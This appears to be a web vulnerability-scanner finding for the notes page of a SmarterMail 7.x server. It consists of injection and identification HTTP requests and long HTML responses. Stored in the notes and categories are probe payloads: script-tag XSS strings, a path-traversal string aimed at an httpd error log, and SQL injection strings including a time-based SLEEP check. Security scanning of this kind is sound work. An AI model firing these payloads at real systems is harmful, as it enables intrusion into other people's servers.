<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl04' name='ctl00$MPH$ctl04' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl04_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl04_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<span id="ctl00_MPH_HyperContextMenu3">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl05' name='ctl00$MPH$ctl05' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl05_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl05_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>

<!-- HyperMultiPage -->
<div class='' id='ctl00_MPH_MP1'>
<input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_pvAddToOutlook" />
<div id='ctl00_MPH_pvAddToOutlook' class='' >
<span id="ctl00_MPH_pvAddToOutlook">
<div id="ctl00_MPH_UpdatePanel1">


<div class="HyperGridWrapper" id="ctl00_MPH_grdAddToOutlook">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdAddToOutlook_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_grdAddToOutlookCheckAll" name="ctl00$MPH$grdAddToOutlookCheckAll" /></th><th scope="col" style="overflow: hidden">Outlook Display Name</th><th scope="col" class="leftpad" style="overflow: hidden">Description</th><th scope="col" class="rc ac nw leftpad" style="overflow: hidden">Last Sync</th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_grdAddToOutlook_CB64_e2I4ZmFmNTAxLWY0MDgtNDFhNS1iNmY1LTBkMzVjMTQzMjdiY30-" name="ctl00_MPH_grdAddToOutlook_CB64_e2I4ZmFmNTAxLWY0MDgtNDFhNS1iNmY1LTBkMzVjMTQzMjdiY30-" /></td><td></td><td class="leftpad">Outlook Sync Connection</td><td class="rc ac nw leftpad">10/2/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="check..
- /Main/frmNotes.aspx

/Main/frmNotes.aspx

http://vulnerable.smartermail.7.x.host:9998/Main/frmNotes.aspx

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmNotes.aspx

Injection Request

GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Identification Request

GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:17:50 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11019
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkdPHNjcmlwdD5ucygweDAwNUNEMSk8L3NjcmlwdD4VAwABIB08c2NyaXB0Pm5zKDB4MDA1Y2QxKTwvc2NyaXB0PhQrAwNnZ2dkZAIGDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwloFgICAQ8WAh4EVGV4dGVkAggPFgIfCWhkAgsPZBYCAgMPZBYCAgEPZBYCZg9kFgICAQ8PFgIfCgUMMTg0NSBub3RlKHMpZGQYAgUXY3RsMDAkTmF2UEgkSHlwZXJQYWdlcjEPBSBjdGwwMF9NUEhfSHlwZXJHcmlkMXwzN3wwfDl8NTB8MGQFFGN0bDAwJE1QSCRIeXBlckdyaWQxDwUxVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHJlYWxkYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGSx2MHk102+VgouU7iWTZ/qxhU+vA==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">

<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>

</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="&lt;script>ns(0x005cd1)&lt;/script>">&lt;script&gt;ns(0x005CD1)&lt;/script&gt;</option>

</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>

<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>

<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>

</div>


<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">


<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden">&nbsp;</th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NjAxZGY1YWMzOWM1NGYxZGFlMjk5NmE4ZGNhMGNiNzk-" name="ctl00_MPH_HyperGrid1_CB64_NjAxZGY1YWMzOWM1NGYxZGFlMjk5NmE4ZGNhMGNiNzk-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x005DC0)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MWVlOGFlMzNhYmIxNDcxZDhlYjg1YjkyYjYxYWUzZmE-" name="ctl00_MPH_HyperGrid1_CB64_MWVlOGFlMzNhYmIxNDcxZDhlYjg1YjkyYjYxYWUzZmE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">../../../../../CANTBEHERE/../../../../../etc/httpd/logs/error.log</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NGE5YjdmOThjMTBiNDdkNTljZDYwZWYxODRmODFiMzE-" name="ctl00_MPH_HyperGrid1_CB64_NGE5YjdmOThjMTBiNDdkNTljZDYwZWYxODRmODFiMzE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">-111 OR SLEEP(25)=0 LIMIT 1-- </td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NWQyYjViYzg2N2RlNDdhZGJlZWRlMTRlZTU3MDM5NGQ-" name="ctl00_MPH_HyperGrid1_CB64_NWQyYjViYzg2N2RlNDdhZGJlZWRlMTRlZTU3MDM5NGQ-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1 OR X='ss</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZWY5Y2Q4YmUwZjIyNDhjNzk0YjhjOTA4MWI1MGU4NmI-" name="ctl00_MPH_HyperGrid1_CB64_ZWY5Y2Q4YmUwZjIyNDhjNzk0YjhjOTA4MWI1MGU4NmI-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MzQ5YTU4YmIxNDU4NDllNThhNDVmZjczNDIzMTljY2Q-" name="ctl00_MPH_HyperGrid1_CB64_MzQ5YTU4YmIxNDU4NDllNThhNDVmZjczNDIzMTljY2Q-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">' OR '1'='1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTFmMWM3OGJhNGZkNDBkNDljMzBlZjdiNWM5ZTM2ODY-" name="ctl00_MPH_HyperGrid1_CB64_MTFmMWM3OGJhNGZkNDBkNDljMzBlZjdiNWM5ZTM2ODY-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">-1 OR 17-7=10</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzNhZDU4NjU1OTRjNGU2NmI2YzgwNGJmZmNhNDdjNTk-" name="ctl00_MPH_HyperGrid1_CB64_YzNhZDU4NjU1OTRjNGU2NmI2YzgwNGJmZmNhNDdjNTk-" /></td><td class="SmallImage"><table class="No..

Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:18:18 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11025
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkdPHNjcmlwdD5ucygweDAwNUNEMSk8L3NjcmlwdD4VAwABIB08c2NyaXB0Pm5zKDB4MDA1Y2QxKTwvc2NyaXB0PhQrAwNnZ2dkZAIGDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwloFgICAQ8WAh4EVGV4dGVkAggPFgIfCWhkAgsPZBYCAgMPZBYCAgEPZBYCZg9kFgICAQ8PFgIfCgUMMTg1OCBub3RlKHMpZGQYAgUXY3RsMDAkTmF2UEgkSHlwZXJQYWdlcjEPBSBjdGwwMF9NUEhfSHlwZXJHcmlkMXwzOHwwfDl8NTB8MGQFFGN0bDAwJE1QSCRIeXBlckdyaWQxDwUxVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHJlYWxkYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGQmoVqTxhlXW0NnUquZfiYdvyajPg==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">

<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>

</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="&lt;script>ns(0x005cd1)&lt;/script>">&lt;script&gt;ns(0x005CD1)&lt;/script&gt;</option>

</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>

<script type="text/javascript">
